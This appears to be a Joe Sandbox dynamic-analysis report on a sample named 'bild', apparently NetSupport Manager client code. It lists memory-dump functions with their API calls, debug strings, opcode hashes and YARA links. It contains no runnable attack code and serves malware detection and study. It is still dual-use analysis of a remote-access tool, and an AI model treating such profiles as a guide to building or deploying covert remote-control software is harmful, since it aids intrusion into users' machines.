Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseHandle$EventObjectSingleWait
String ID:
API String ID: 2857295742-0
Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50

Function 110770E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B

Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3

EqualRect.USER32(?,?), ref: 1107713C
SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
m_hWnd, xrefs: 11077177

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Window$DeferEqualPointsRect
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2754115966-2830328467
Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4

Function 11089150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6

Strings

..\ctl32\Errorhan.cpp, xrefs: 110891B8, 110891E7
hMap, xrefs: 110891BD

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLock
String ID: ..\ctl32\Errorhan.cpp$hMap
API String ID: 2752051264-327499879
Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1

Function 11143110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
_strrchr.LIBCMT ref: 1114315A
_strrchr.LIBCMT ref: 1114316A
wsprintfA.USER32 ref: 11143185

Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA

Strings

BILD, xrefs: 11143180, 1114318E, 11143195, 111431C2

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Module_strrchr$FileHandleNamewsprintf
String ID: BILD
API String ID: 2529650285-1114602597
Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0

Function 11065340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
_memmove.LIBCMT ref: 110653B1

Strings

No default printer,,LPT1:, xrefs: 11065357
Device, xrefs: 1106535C
Windows, xrefs: 11065361

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: Device$No default printer,,LPT1:$Windows
API String ID: 1665476579-2460060945
Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1

Function 110450BD Relevance: 7.9, APIs: 5, Instructions: 401COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 11045345
SysFreeString.OLEAUT32(?), ref: 110453E5
SysFreeString.OLEAUT32(?), ref: 110453F4
_memset.LIBCMT ref: 1104545F
SysFreeString.OLEAUT32(?), ref: 110454BA

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: FreeString$__wcsicoll_memset
String ID:
API String ID: 3719176846-0
Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50

Function 11045160 Relevance: 7.8, APIs: 5, Instructions: 258COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 11045345
SysFreeString.OLEAUT32(?), ref: 110453E5
SysFreeString.OLEAUT32(?), ref: 110453F4
_memset.LIBCMT ref: 1104545F
SysFreeString.OLEAUT32(?), ref: 110454BA

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: FreeString$__wcsicoll_memset
String ID:
API String ID: 3719176846-0
Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50

Function 11021300 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11021362
IsWindowVisible.USER32(00000000), ref: 11021433
wsprintfA.USER32 ref: 11021477

Strings

%d,%d,%d,%d,%d,%d, xrefs: 11021471

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: wsprintf$VisibleWindow
String ID: %d,%d,%d,%d,%d,%d
API String ID: 1671172596-1913222166
Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0

Function 11117000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1111701F
DeleteObject.GDI32(00000000), ref: 11117143
GetTickCount.KERNEL32 ref: 11117159

Strings

BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountTick$DeleteObject
String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
API String ID: 3011517232-3209293507
Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00

Function 110D1090 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 110D1128

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

..\CTL32\NSMString.cpp, xrefs: 110D10A7, 110D10DA, 110D114E
IsA(), xrefs: 110D10AC, 110D1153
cchLen<=0 || cchLen<=(int) _tcslen(pszStr), xrefs: 110D10DF

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
API String ID: 1528188558-323366856
Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294

Function 110B91D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260

Strings

Max, xrefs: 110B91E0

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: InfoMoveParametersSystemTimerWindow
String ID: Max
API String ID: 1521622399-2772132969
Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0

Function 110ED0F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110ED118

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

lpNmHdr!=0, xrefs: 110ED103
IsWindow(hRich), xrefs: 110ED129
..\CTL32\NSWin32.cpp, xrefs: 110ED0FE, 110ED124

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
API String ID: 2577986331-1331251348
Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5

Function 110813C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 11081417

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

..\CTL32\DataStream.cpp, xrefs: 110813D4
IsA(), xrefs: 110813D9, 11081400
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110813FB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
